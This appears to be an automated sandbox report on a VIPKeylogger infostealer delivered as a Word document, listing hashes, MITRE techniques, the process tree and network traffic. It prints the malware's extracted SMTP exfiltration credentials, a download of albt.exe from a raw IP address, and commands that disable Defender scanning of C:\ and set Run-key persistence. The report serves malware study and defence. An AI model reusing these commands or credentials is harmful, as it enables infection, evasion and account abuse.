vipkeylogger | 94519fee9d47fd0262d1dd50e0bf20ea7cb0962b3a1e1de217c5f462b0633fab

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
14/01/2025, 07:07 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PI ITS15235.doc
Size

143KB
MD5

c8e60db8174345c243187675d4c760de
SHA1

34bdd0903708f1ab747cbb45a6a292517e1df83e
SHA256

94519fee9d47fd0262d1dd50e0bf20ea7cb0962b3a1e1de217c5f462b0633fab
SHA512

ae643f21123ef8514bf4ac405f0f385534b7d87fa681669d8bc276b81cecfce0e4660843aa442ec52882ca66e8f7cf80c3952bd0fc039ac5dc0d8047b970e769
SSDEEP

1536:L7dgmjjy2lQkySTUb2roegTK+g9WomfaQjSqttJnkL5mS9kBwNR42q8Z:LZPjbTU+J799IjSqtteL5N9kBF2

Score

10^/10

vipkeylogger collection discovery keylogger persistence spyware stealer

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
mail.irco.com.sa
Port:
587
Username:
info@irco.com.sa
Password:
info12A

Extracted

Family

vipkeylogger

Signatures

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
stealer keylogger vipkeylogger
Vipkeylogger family
vipkeylogger
Downloads MZ/PE file

Executes dropped EXE 4 IoCs

pid	Process
1972	brightness.exe
996	svchost.pif
1264	xkn.pif
3748	npratlsN.pif

Loads dropped DLL 1 IoCs

pid	Process
996	svchost.pif

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	npratlsN.pif
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	npratlsN.pif
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	npratlsN.pif

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nsltarpn = "C:\\Users\\Public\\Nsltarpn.url"	brightness.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
87	reallyfreegeoip.org
88	reallyfreegeoip.org
85	checkip.dyndns.org

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1972 set thread context of 3748	1972	brightness.exe	105

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	brightness.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	npratlsN.pif

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
32	PING.EXE

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	xkn.pif
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	xkn.pif
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	xkn.pif

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
32	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	12	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	70	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1096	WINWORD.EXE
1096	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1264	xkn.pif
1264	xkn.pif
3748	npratlsN.pif
3748	npratlsN.pif
3748	npratlsN.pif

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1264	xkn.pif
Token: SeDebugPrivilege	3748	npratlsN.pif

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
1096	WINWORD.EXE
1096	WINWORD.EXE
1096	WINWORD.EXE
1096	WINWORD.EXE
1096	WINWORD.EXE
1096	WINWORD.EXE
1096	WINWORD.EXE

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1096 wrote to memory of 1972	1096	WINWORD.EXE	86
PID 1096 wrote to memory of 1972	1096	WINWORD.EXE	86
PID 1096 wrote to memory of 1972	1096	WINWORD.EXE	86
PID 1972 wrote to memory of 1656	1972	brightness.exe	93
PID 1972 wrote to memory of 1656	1972	brightness.exe	93
PID 1972 wrote to memory of 1656	1972	brightness.exe	93
PID 1972 wrote to memory of 3040	1972	brightness.exe	95
PID 1972 wrote to memory of 3040	1972	brightness.exe	95
PID 1972 wrote to memory of 3040	1972	brightness.exe	95
PID 3040 wrote to memory of 996	3040	cmd.exe	97
PID 3040 wrote to memory of 996	3040	cmd.exe	97
PID 996 wrote to memory of 2692	996	svchost.pif	98
PID 996 wrote to memory of 2692	996	svchost.pif	98
PID 2692 wrote to memory of 1612	2692	cmd.exe	100
PID 2692 wrote to memory of 1612	2692	cmd.exe	100
PID 2692 wrote to memory of 1264	2692	cmd.exe	101
PID 2692 wrote to memory of 1264	2692	cmd.exe	101
PID 2692 wrote to memory of 32	2692	cmd.exe	102
PID 2692 wrote to memory of 32	2692	cmd.exe	102
PID 1972 wrote to memory of 3748	1972	brightness.exe	105
PID 1972 wrote to memory of 3748	1972	brightness.exe	105
PID 1972 wrote to memory of 3748	1972	brightness.exe	105
PID 1972 wrote to memory of 3748	1972	brightness.exe	105
PID 1972 wrote to memory of 3748	1972	brightness.exe	105

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	npratlsN.pif

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	npratlsN.pif

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PI ITS15235.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1096
- C:\Users\Admin\AppData\Local\Temp\brightness.exe
  C:\Users\Admin\AppData\Local\Temp\brightness.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Public\NsltarpnF.cmd" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3040
  - - C:\Windows \SysWOW64\svchost.pif
      "C:\Windows \SysWOW64\svchost.pif"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:996
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\NEO.cmd
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2692
      - C:\Windows\system32\extrac32.exe
        
        extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.pif"
        6⤵
        
        PID:1612
      - C:\Users\Public\xkn.pif
        
        C:\\Users\\Public\\xkn.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
        6⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1264
      - C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 10
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:32
- - C:\Users\Public\Libraries\npratlsN.pif
    C:\Users\Public\Libraries\npratlsN.pif
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - outlook_office_path
    - outlook_win_path
    PID:3748

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

28.118.140.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.118.140.52.in-addr.arpa

IN PTR

Response
DNS

20.49.80.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

20.49.80.91.in-addr.arpa

IN PTR

Response
DNS

roaming.officeapps.live.com

WINWORD.EXE

Remote address:

8.8.8.8:53

Request

roaming.officeapps.live.com

IN A

Response

roaming.officeapps.live.com

IN CNAME

prod.roaming1.live.com.akadns.net

prod.roaming1.live.com.akadns.net

IN CNAME

eur.roaming1.live.com.akadns.net

eur.roaming1.live.com.akadns.net

IN CNAME

weu-azsc-000.roaming.officeapps.live.com

weu-azsc-000.roaming.officeapps.live.com

IN CNAME

osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com

osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com

IN A

52.109.89.19
GET

http://147.124.216.113/albt.exe

WINWORD.EXE

Remote address:

147.124.216.113:80

Request

GET /albt.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: 147.124.216.113

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Last-Modified: Mon, 13 Jan 2025 01:10:58 GMT
Accept-Ranges: bytes
ETag: "9ca0aa05865db1:0"
Server: Microsoft-IIS/8.5
Date: Tue, 14 Jan 2025 07:07:06 GMT
Content-Length: 1443328
POST

https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

WINWORD.EXE

Remote address:

52.109.89.19:443

Request

POST /rs/RoamingSoapService.svc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
User-Agent: MS-WebServices/1.0
SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
Content-Length: 511
Host: roaming.officeapps.live.com

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/10.0
X-OfficeFE: RoamingFE_IN_297
X-OfficeVersion: 16.0.18505.30575
X-OfficeCluster: weu-000.roaming.officeapps.live.com
Content-Security-Policy-Report-Only: script-src 'nonce-SZAju1Bj82U91DwVv5oOKWRiLNCvBdaQ7aHDo6mBsOwKCzKfknd8H660xF+IN9pYKv8qmyyCmnHYJRwOCYW5u4VjMM1gn6HVRwfghs18mfPHl2DU8FDkP6bzUaIdRvE07gPacCnCGvtuCjggo7cTHVJ5IfXeyiCd5PGzJRwvLfY=' 'unsafe-inline' 'unsafe-eval' 'strict-dynamic' https:; base-uri 'self'; object-src 'none'; require-trusted-types-for 'script'; report-uri https://csp.microsoft.com/report/OfficeIce-OfficeRoaming-Prod; frame-ancestors 'none';
X-Frame-Options: Deny
X-CorrelationId: e122e0b6-8eb9-4ab2-8910-804e4076e553
X-Powered-By: ASP.NET
Date: Tue, 14 Jan 2025 07:07:08 GMT
Content-Length: 654
DNS

19.89.109.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.89.109.52.in-addr.arpa

IN PTR

Response
DNS

113.216.124.147.in-addr.arpa

Remote address:

8.8.8.8:53

Request

113.216.124.147.in-addr.arpa

IN PTR

Response
DNS

0.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.159.190.20.in-addr.arpa

IN PTR

Response
DNS

167.173.78.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

167.173.78.104.in-addr.arpa

IN PTR

Response

167.173.78.104.in-addr.arpa

IN PTR

a104-78-173-167deploystaticakamaitechnologiescom
DNS

154.239.44.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

154.239.44.20.in-addr.arpa

IN PTR

Response
DNS

122.10.44.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

122.10.44.20.in-addr.arpa

IN PTR

Response
DNS

metadata.templates.cdn.office.net

WINWORD.EXE

Remote address:

8.8.8.8:53

Request

metadata.templates.cdn.office.net

IN A

Response

metadata.templates.cdn.office.net

IN CNAME

templatesmetadata.office.net

templatesmetadata.office.net

IN CNAME

templatesmetadata.office.net.edgekey.net

templatesmetadata.office.net.edgekey.net

IN CNAME

e26769.dscb.akamaiedge.net

e26769.dscb.akamaiedge.net

IN A

23.48.165.159

e26769.dscb.akamaiedge.net

IN A

23.48.165.161
GET

https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C

WINWORD.EXE

Remote address:

23.48.165.159:443

Request

GET /client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: metadata.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Type: text/xml
Server: Kestrel
Content-Encoding: gzip
Content-Length: 1264
Cache-Control: max-age=159017
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Vary: Accept-Encoding
DNS

binaries.templates.cdn.office.net

WINWORD.EXE

Remote address:

8.8.8.8:53

Request

binaries.templates.cdn.office.net

IN A

Response

binaries.templates.cdn.office.net

IN CNAME

binaries.templates.cdn.office.net.edgesuite.net

binaries.templates.cdn.office.net.edgesuite.net

IN CNAME

a1847.dscg2.akamai.net

a1847.dscg2.akamai.net

IN A

2.18.190.198

a1847.dscg2.akamai.net

IN A

2.18.190.195
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp02835233.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 46413
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: xFXEvEvsng2mfE0eU+RtWg==
Last-Modified: Fri, 22 Apr 2016 16:09:25 GMT
ETag: 0x8D36AC879BBB45C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ba2ddc95-e01e-0035-4364-29ec51000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp03328905.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 20457
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: TvpI7DB+ry+bNGoHPGf8+w==
Last-Modified: Fri, 22 Apr 2016 16:09:46 GMT
ETag: 0x8D36AC886167DDF
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3e37f31b-801e-0044-5062-b90015000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp03328893.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 20235
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 48ZBc7L0qnq3LhOWqVFL2A==
Last-Modified: Fri, 22 Apr 2016 16:10:17 GMT
ETag: 0x8D36AC898C9059A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 984e6235-501e-0057-1e97-a02419000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp03328908.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31083
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: iamBjmZY1zpztkJSL/hwHw==
Last-Modified: Fri, 22 Apr 2016 16:09:46 GMT
ETag: 0x8D36AC8865F4922
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7551dfc1-501e-00b3-0597-a02a87000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp02851216.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 34816
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: YoYxJM3NoTXswOcieCy4iA==
